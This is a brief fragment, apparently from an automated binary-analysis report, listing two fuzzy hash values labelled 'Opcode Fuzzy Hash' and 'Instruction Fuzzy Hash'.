                                                                                          • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                          • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99